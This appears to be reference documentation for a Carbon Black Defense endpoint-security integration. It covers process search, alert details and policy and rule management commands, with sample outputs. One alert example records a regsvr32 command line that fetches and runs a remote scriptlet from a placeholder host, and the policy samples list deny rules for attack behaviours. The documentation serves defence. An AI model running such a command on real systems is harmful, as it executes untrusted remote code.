| DeviceDetails DeviceLocation AreaCode | 0 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation DmaCode | 0 |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation MetroCode | 0 |
| DeviceDetails DeviceLocation PostalCode | |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
Get multiple processes
Returns the details of multiple process, as specified by further input.
Base Command
cbd-find-processes
Input
| Parameter | Description | More Information |
| hostNameExact | The exact hostname. | Case sensitive. |
| ownerName | Case insensitive owner name. | Case in sensitive. |
| ownerNameExact |
Exact owner name |
Case sensitive. |
| ipAddress | External or internal IP address | - |
| searchWindow |
Events generated within a given time frame |
Default is one day. Events may not be available after 30 days due to retention policies. |
| start | Shows result from this row and after | - |
| rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
| CarbonBlackDefense.GetProcesses.ApplicationName | Application name |
| CarbonBlackDefense.GetProcesses.ProcessId | Process ID |
| CarbonBlackDefense.GetProcesses.NumEvents | Number of events |
| CarbonBlackDefense.GetProcesses.ApplicationPath | Application path |
| CarbonBlackDefense.GetProcesses.PrivatePid | Private PID |
| CarbonBlackDefense.GetProcesses.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetProcesses.TotalResults | Total results |
Command Example
!cbd-find-processes ipAddress="67.143.208.113" rows=2
Context Example
CarbonBlackDefense:{} 1 item
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Human Readable Output
| ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash |
|---|---|---|---|---|---|
| Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d |
| cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b |
Get alert details
Returns the details of a specified alert.
Base Command
cbd-get-alert-details
Input
| Parameter | Description |
| alertId | Alert ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group | Group |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId | Group ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime | Registered time |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion | OS version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance | Importance |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message | Message |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success | Success |
| CarbonBlackDefense.GetAlertDetails.Events.ParentHash | Parent hash |
| CarbonBlackDefense.GetAlertDetails.Events.PolicyState | Policy state |
| CarbonBlackDefense.GetAlertDetails.Events.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators | Threat indicators |
| CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessHash | Process hash |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash | Process MD5 hash |
| CarbonBlackDefense.GetAlertDetails.Events.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.Events.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.Events.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus | Kill chain status |
| CarbonBlackDefense.GetAlertDetails.Events.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPPid | ParentP PID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid | ProcessP PID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId | Incident ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName | Indicator name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary | Summary |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId | Threat ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore | Threat score |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time | Time |
Command Example
!cbd-get-alert-details alertId=HWOXYQ6P
Context Example
Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe
Get all policy details.
Returns the details of all policies. the details
Base Command
cbd-get-policies
Input
There is no input for this command.
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicies.Id | The policy ID |
| CarbonBlackDefense.GetPolicies.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicies.SystemPolicy | System policy ( boolean ) |
| CarbonBlackDefense.GetPolicies.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicies.Policy | The policy object |
Command Example
!cbd-get-policies
Context Example
CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Get the details of a specified policy
Returns the details of a specified policy.
Base Command
cbd-get-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicy.Id | The policy ID |
| CarbonBlackDefense.GetPolicy.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicy.SystemPolicy | System policy ( boolean ) |
| CarbonBlackDefense.GetPolicy.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicy.Policy | The policy object |
Command Example
!cbd-get-policy policyId=6525
Context Example
CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Human Readable Output
| Id | 6525 |
|---|---|
| LatestRevision | 1488926710902 |
| Policy | {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]} |
| PriorityLevel | MEDIUM |
| SystemPolicy | true |
Create a policy
Creates a policy, as prescribed by further input.
Base Command
cbd-create-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy |
| policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
| Path | Description |
| CarbonBlackDefense.CreatePolicy.PolicyId | The new policy ID |
Command Example
!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }
Context Example
CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356
Human Readable Output
| PolicyId | 21356 |
|---|
Update a policy
Updates an existing policy.
Base Command
cbd-update-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy. |
| id |
The ID of the policy to update. |
| policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
There is no context output for this command.
Command Example
!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}
Human Readable Output
Request Success
Delete a policy
Deletes a specified policy.
Base Command
cbd-delete-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Human Readable Output
Request Success
Add a rule to a policy
Adds a specified rule to a specified policy.
Base Command
cbd-add-rule-to-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Rule required |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"
Human Readable Output
Request Success
Delete a rule from a policy
Deletes a specified rule from a specified policy.
Base Command
cbd-delete-rule-from-policy
Input
| Parameter | Description |
| policyId | ID of the policy to delete the rule from |
| ruleId | ID of the rule to delete |
Context Output
There is no context output for this command.
Command Example
!cbd-delete-rule-from-policy ruleId=2 policyId=21355
Human Readable Output
Request Success
Update a rule in a policy
Updates a rule in a specified policy.
Base Command
cbd-update-rule-in-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Rule required |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST
Human Readable Output
Request Success
Set a policy
Sets a specified policy.
Base Command
cbd-set-policy
Input
| Parameter | Description |
| keyValue |
A JSON object that holds key-value pairs. Key is the field path in the policy object to update with value. |
| policy |
The policy to set. |
Context Output
There is no context output for this command.